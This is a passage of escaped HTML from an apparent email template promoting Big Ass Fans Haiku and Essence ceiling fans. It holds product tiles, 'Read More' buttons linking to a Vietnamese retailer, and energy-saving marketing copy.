style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #727171; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Haiku 84 inch - Moso Bambo Airfoils<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-84inch\\\" style=\\\"height:37px; v-text-anchor:middle; width:116px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#3AAEE0\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Montserrat\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-84inch\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Montserrat\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #3AAEE0; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">Read More<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_image_3\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 0px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122670015-h-2.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 75%;max-width: 150px;\\\" width=\\\"150\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #727171; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Haiku 52\\/60 inch - Moso Bambo Airfoils<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-h\\\" style=\\\"height:37px; v-text-anchor:middle; width:116px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#3AAEE0\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Montserrat\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-h\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Montserrat\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #3AAEE0; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">Read More<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_image_4\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 8px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122680334-h-3.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 80%;max-width: 145.6px;\\\" width=\\\"145.6\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #727171; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Essence - Aluminium Airfoils<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/essence\\\" style=\\\"height:37px; v-text-anchor:middle; width:116px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#3AAEE0\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Montserrat\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/essence\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Montserrat\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #3AAEE0; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">Read More<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296773906-login_customers.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 0px 0px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1607002000922-vvb.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 600px;\\\" width=\\\"600\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #cc7202;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #cc7202;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122312096-haiku-logo.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">No fan manufacturer goes to greater lengths to create energy-efficient products than Big Ass Fans. It\\u2019s why businesses worldwide use our fans to cut heating and cooling costs by up to 30% and why designers rely on our ENERGY STAR\\u00ae-rated ceiling fan models to meet the growing demand for sustainable, LEED-certified projects.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 0px 40px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1607002319908-vvb2.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 600px;\\\" width=\\\"600\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #727171; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>SMART CEILING FAN, SMART MODES<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"line-height: 150%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 150%;\\\">Haiku can mimic a gentle breeze, save energy, adjust for optimal sleep, and run on a timer\\u2014all through the included remote or the Big Ass Fans Haiku mobile app.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 